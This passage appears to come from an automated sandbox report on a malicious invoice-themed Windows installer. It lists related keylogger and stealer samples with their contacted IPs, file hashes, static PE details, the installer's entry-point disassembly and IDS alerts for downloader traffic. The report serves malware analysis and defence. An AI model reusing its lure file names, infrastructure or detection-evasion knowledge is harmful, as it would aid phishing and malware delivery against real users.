                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            37f463bf4616ecd445d4a1937da06e19JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            Richiesta Proposta (MACHINES ITALIA) 18-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            VqCbf9fhnQ.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193

                                                                                                            Dropped Files

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dllJOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                              rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                  mU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                    SBSLMD5qhm.msiGet hashmaliciousMetasploitBrowse
                                                                                                                      mU4lYkmS6K.exeGet hashmaliciousCobaltStrikeBrowse
                                                                                                                        TouchEn_nxKey_32bit.exeGet hashmaliciousUnknownBrowse
                                                                                                                          SecuriteInfo.com.Riskware.OfferCore.11979.8662.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                                                                                            SecuriteInfo.com.Riskware.OfferCore.11979.8662.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                                                                                              Batseba.exeGet hashmaliciousGuLoaderBrowse

                                                                                                                                Created / dropped Files

                                                                                                                                C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11776
                                                                                                                                Entropy (8bit):5.890541747176257
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                                                                MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                                                                SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                                                                SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                                                                SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                Joe Sandbox View:
                                                                                                                                • Filename: JOSHHHHHH.exe, Detection: malicious, Browse
                                                                                                                                • Filename: rCEMG242598.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SBSLMD5qhm.msi, Detection: malicious, Browse
                                                                                                                                • Filename: mU4lYkmS6K.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SBSLMD5qhm.msi, Detection: malicious, Browse
                                                                                                                                • Filename: mU4lYkmS6K.exe, Detection: malicious, Browse
                                                                                                                                • Filename: TouchEn_nxKey_32bit.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious, Browse
                                                                                                                                • Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious, Browse
                                                                                                                                • Filename: Batseba.exe, Detection: malicious, Browse
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L.....oZ...........!..... ...........).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...x....@.......(..............@....reloc..~....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\Juratid.sta

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):280064
                                                                                                                                Entropy (8bit):7.6785955749534125
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:PcMjJbzfp9GKi35S7rVs13ABPi6mKAyLh/zC8+LvUm:ljJbzfsk2ZXJQbErUm
                                                                                                                                MD5:861C5521243EDE7D6A843BED4028EB0A
                                                                                                                                SHA1:F8DF496611CD8E97D67CF12C4D5F0A61B8D4B58E
                                                                                                                                SHA-256:B04DD763C94E3CB7AF32E8ED4F6E2822F51868165B9658632DAF7C3AD5487820
                                                                                                                                SHA-512:350E4A5943907F99AFE3F9876D15B127AFDB214F7EB26765F54940D36D251BD7EED45B6F58B9DF8C42640184E314F90227523923F7750D30B5930E6D16A36EC0
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:............a.................Q....vvv.BBB.....................................>.ii.........................................I.G..............Z..x....................D.a......JJ...O...Z....^^^..{......".......e...........PPP....................................///.....p...,.............................y.66......RR..................X.......ee...............(.................999.AA......BB...|.................5..EE...[[[........-.........(................h...............4..............(.........D.Q.......}}..............$....PPPP.ZZ.{{{................g.........................```......q.../...7...G..............RRR...........**................................""............b.gg.........!..5555.....................@.ggg..__.......``.........`..............{............RRR.......<<<<<.....///.''''..........3.......................ddd......c.*......ggg......t...........`...................FFFFF.....rr..........P.........999..................!!...............B..9.....................VV........

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\autotypes.ome

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):260287
                                                                                                                                Entropy (8bit):1.254154410305323
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:Q5nWJhkFhi66opmz9ShwPfMJWoQm6ScPZktW4mOyQi0Qj6RbEKq2hmPpR+4ZFetp:t3zfTlGsyyshore
                                                                                                                                MD5:28C5FEB9676D16DFCAC793FCB586D0BF
                                                                                                                                SHA1:7EA42930F4771A57AA51F3A36BD3492A9D423CA2
                                                                                                                                SHA-256:60753AF58DB3E39BEC4353D9FEB84CA3E597B16B077AAB1CB1DB8F9617DA689A
                                                                                                                                SHA-512:C9FFD961CE1B681FAE3502C42C30011DDFE3F07057E4AF9DD475CCE27EA7F757B136612AE9274FFD7846BD160A6FD3F9A051F811CC06B88D5A5A8E6C86E5D417
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.............................Y........8........................8......J........................................;......................................................w......:.....2......r.....................I...............................&............g......_...&......-.............K.........................p.............R.................n.............,...U..............................................................................................L.................. .................h...................................................d...........................................................(..........................................<...i......................k.....................................t..............1.............G.....................................................................:..T........................n.....x.t........T>...........x......................................X....................|............A..........................Z..............t..............

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\fonta.jpg

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:JPEG image data, baseline, precision 8, 300x400, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10006
                                                                                                                                Entropy (8bit):7.924618802758961
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:lNvMk8Cb5NZDr/GNVAPsIGGKlmY6fJCveK/2dg7cfcyDmIqAtVv13q:l2+/F/GNVxAKv6Uv3/alfcJIq416
                                                                                                                                MD5:6CADFF319A0C0C41B7A4DDB8BF97467B
                                                                                                                                SHA1:BFFCA9F6851994C709B6DEC83333DA7D6033FE54
                                                                                                                                SHA-256:402A8F58CB8AA75CF9D7A15F3D7E328F8703CCD7B5378F704D71660283D585F3
                                                                                                                                SHA-512:40F2A4355A0A23D955FDA347FFF9490F89A36A83D1395DD144C93B75451DB82CCE010B16AE12391B466BAE45C7AE146BB54BD4FB4D44A430899CD5727F2E7C99
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.....C..............................................!........."$".$.......C.........................................................................,..".........................................B.........................!1.AQ.aq...."2..BR..#r....$34b..C.%ST................................"......................1.!.A."Qa.............?..1aB.]`.H.IHJ...NJ..H.Q..!A..LR.$e)NR.4B....p.;.r....c....%3....9F...mK....x.[g..J.!c..U..O,....]ne....].Lg.Zdr.h......EL~..7.t..9.=.T..A...q.r.rq..|3.9.J..{.kI.....a1.......0....Yq..N...[E...D...{.^...,...{..1f1...8......[zi....D]..7-..X...G@..R..I:r....(....JH\.r...)wz.\.K..e.K....)wz.......]-.6...B.]z..R.a)IR.R9.R....(...N.J%*.JG')..B..).R+.;.w(.JR..HJ.J."R....IJT..]b..dK.....cG%)rR.h..K....#.%..]....$%e.Mu..Ku.B=.\...=...%)^.6...(......R....tP*E)JbR9...!LR..9FT.F."...D.%...7'rGn.B...HP.t.@.PXJ..J...).@...$.%a)IRa(..(]I.XJ.AF.e.%.n..n...t3$&.....z.V,^.2..2R.R.%. (.JB..JQ)IQ)@.R.....LJGl.WYF..Q....r.).B...R.....).).P+.....

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\kvaksalvere.res

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):405939
                                                                                                                                Entropy (8bit):1.2491912183523404
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:eSl70WcO+njwdPBRvYfH7gIxVXMBMAPAtG3nXw0g9:eSGWgni5egGVcu6AwQ0g9
                                                                                                                                MD5:B8F536887229B6B6A9D9F1C6BDBC830A
                                                                                                                                SHA1:7F6AF7E79427319CD428930CD325EBF234140246
                                                                                                                                SHA-256:9F084456A8DB39E0BE8FF458A057CC112F28976F50CCDEB6B9968475211E36B6
                                                                                                                                SHA-512:754F73D030295425F40FDD4D6B6E32F9D48D08976218510670AF508A2E74041ABE6317770ACBDB6278B0FBBB4908D1B9282462D61F526404CFF3C781431716BE
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:............................Pj..........................i%..........................J..........................#..c.........................../......C.#.............................].i..=.....C..............................................................................................................................j............{..................................................................G...........................................................................................^K..............................<..$.................................................#.............................................................4..............N................................%.......................................................-...................`............................E.)..f..........................................................l..............l.........................................#.]............K.....................................8....9.............n...............

                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\rigsfaellesskab\ters.gra

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):485288
                                                                                                                                Entropy (8bit):1.252508150615448
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:nCssk3ToWdMOZQJ6sF7DR6iI3gP1KeCHDkTv:nCssk3UCNMZDRMkeyv
                                                                                                                                MD5:B7786B087E97406D67958314CE8D7DFC
                                                                                                                                SHA1:857FBDE03F498A5CF1B386C74485C24633673AF4
                                                                                                                                SHA-256:7A03749583188B2FBBF13ED0788600C942BBA5FCF4D34BEBBEC2764CB35C2D7B
                                                                                                                                SHA-512:5FA986F3F85D66DCD22643B11F233EBA31E04006D7F2EFCCE22CF6CB29B072E2F86FD3AA5B707D1CEC6ED3522D49EFDD247241AE147C5692AD5D438B31525767
                                                                                                                                Malicious:false
                                                                                                                                Preview:..............................g.....................................7........................................................................|...........r...................................q.....................................0................^.............]................@............4..........p..........................y..................................................8...............3...........%.............;T.................{...`:..........=...........................j.............................................q..............O................+......&...................................r................E...................;................d....R...................................................}..................K.....j......................................^.........G.............y.....................3....................................................#.....i..........0..............................................................O....................m..........1..........

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                Entropy (8bit):7.5106727657586685
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Factura Honorarios 2024-11-17.exe
                                                                                                                                File size:701'493 bytes
                                                                                                                                MD5:2494d7b2fd14dc5604fd6aa412f170fc
                                                                                                                                SHA1:dc2b1e324c49c9f0fa446211ed24841c48371ef0
                                                                                                                                SHA256:0cf14ff76c5d927ad6de94e8d632592a776adb36c733680fcf6385a5d1fed069
                                                                                                                                SHA512:93543406973f6243703fa508a16c37166fc25227755eb97b62556a2d5370cd9b22bf21f0cb7c825b3d2fc4c727f623fa0fe586c0e653c3f9a48ef9a83dea6d90
                                                                                                                                SSDEEP:12288:fTkuHDdugNuvuAE69ciyBfwKvpsQKnsk2axTsy:fTRogNATSNJvqxTsy
                                                                                                                                TLSH:04E40183EC44D690E9644F30643F1D7E83AB3E7A5944091E3F98B6742CF3592E617A2B
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....oZ.................d...*.....

                                                                                                                                File Icon

                                                                                                                                Icon Hash:1716c64c5e5ab51d

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x403359
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                sub esp, 000002D4h
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                push 00000020h
                                                                                                                                pop edi
                                                                                                                                xor ebx, ebx
                                                                                                                                push 00008001h
                                                                                                                                mov dword ptr [esp+14h], ebx
                                                                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                                call dword ptr [004080A8h]
                                                                                                                                call dword ptr [004080A4h]
                                                                                                                                and eax, BFFFFFFFh
                                                                                                                                cmp ax, 00000006h
                                                                                                                                mov dword ptr [0042A20Ch], eax
                                                                                                                                je 00007F682CF010F3h
                                                                                                                                push ebx
                                                                                                                                call 00007F682CF043A5h
                                                                                                                                cmp eax, ebx
                                                                                                                                je 00007F682CF010E9h
                                                                                                                                push 00000C00h
                                                                                                                                call eax
                                                                                                                                mov esi, 004082B0h
                                                                                                                                push esi
                                                                                                                                call 00007F682CF0431Fh
                                                                                                                                push esi
                                                                                                                                call dword ptr [00408150h]
                                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                                cmp byte ptr [esi], 00000000h
                                                                                                                                jne 00007F682CF010CCh
                                                                                                                                push 0000000Ah
                                                                                                                                call 00007F682CF04378h
                                                                                                                                push 00000008h
                                                                                                                                call 00007F682CF04371h
                                                                                                                                push 00000006h
                                                                                                                                mov dword ptr [0042A204h], eax
                                                                                                                                call 00007F682CF04365h
                                                                                                                                cmp eax, ebx
                                                                                                                                je 00007F682CF010F1h
                                                                                                                                push 0000001Eh
                                                                                                                                call eax
                                                                                                                                test eax, eax
                                                                                                                                je 00007F682CF010E9h
                                                                                                                                or byte ptr [0042A20Fh], 00000040h
                                                                                                                                push ebp
                                                                                                                                call dword ptr [00408044h]
                                                                                                                                push ebx
                                                                                                                                call dword ptr [004082A0h]
                                                                                                                                mov dword ptr [0042A2D8h], eax
                                                                                                                                push ebx
                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                push 000002B4h
                                                                                                                                push eax
                                                                                                                                push ebx
                                                                                                                                push 004216A8h
                                                                                                                                call dword ptr [00408188h]
                                                                                                                                push 0040A2C8h

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x4d0000x31a60.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2b0.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x62a50x6400f4cff166abb4376522cf86cbd302f644False0.658984375data6.431390019180314IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x80000x138e0x14002914bac53cd4485c9822093463e4eea6False0.4509765625data5.146454805063938IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0xa0000x203180x6007d0d44c89e64b001096d8f9c60b1ac1bFalse0.4928385416666667data3.90464114821524IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .ndata0x2b0000x220000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x4d0000x31a600x31c00237771be3091971063543e3d2d100b74False0.4750166849874372data5.510842081259168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0x4d4480x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.2920412871169999
                                                                                                                                RT_ICON0x5dc700x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.422640319529115
                                                                                                                                RT_ICON0x671180x71dcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9881295457664334
                                                                                                                                RT_ICON0x6e2f80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.4291589648798521
                                                                                                                                RT_ICON0x737800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.4052905054322154
                                                                                                                                RT_ICON0x779a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.5110995850622406
                                                                                                                                RT_ICON0x79f500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.5211069418386491
                                                                                                                                RT_ICON0x7aff80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5119936034115139
                                                                                                                                RT_ICON0x7bea00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.6262295081967213
                                                                                                                                RT_ICON0x7c8280x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.677797833935018
                                                                                                                                RT_ICON0x7d0d00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.6785714285714286
                                                                                                                                RT_ICON0x7d7980x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.49710982658959535
                                                                                                                                RT_ICON0x7dd000x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.674645390070922
                                                                                                                                RT_DIALOG0x7e1680x100dataEnglishUnited States0.5234375
                                                                                                                                RT_DIALOG0x7e2680x11cdataEnglishUnited States0.6056338028169014
                                                                                                                                RT_DIALOG0x7e3880xc4dataEnglishUnited States0.5918367346938775
                                                                                                                                RT_DIALOG0x7e4500x60dataEnglishUnited States0.7291666666666666
                                                                                                                                RT_GROUP_ICON0x7e4b00xbcdataEnglishUnited States0.6595744680851063
                                                                                                                                RT_VERSION0x7e5700x1acdataEnglishUnited States0.5747663551401869
                                                                                                                                RT_MANIFEST0x7e7200x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                KERNEL32.dllSetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                                                                USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                                                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                                                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                                                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishUnited States

                                                                                                                                Network Behavior

                                                                                                                                Suricata IDS Alerts

                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                2024-11-18T13:50:47.489752+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.849709142.250.185.174443TCP
                                                                                                                                2024-11-18T13:50:55.714204+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711193.122.6.16880TCP
                                                                                                                                2024-11-18T13:50:59.229900+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.849711193.122.6.16880TCP
                                                                                                                                2024-11-18T13:50:59.975414+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.849715188.114.97.3443TCP
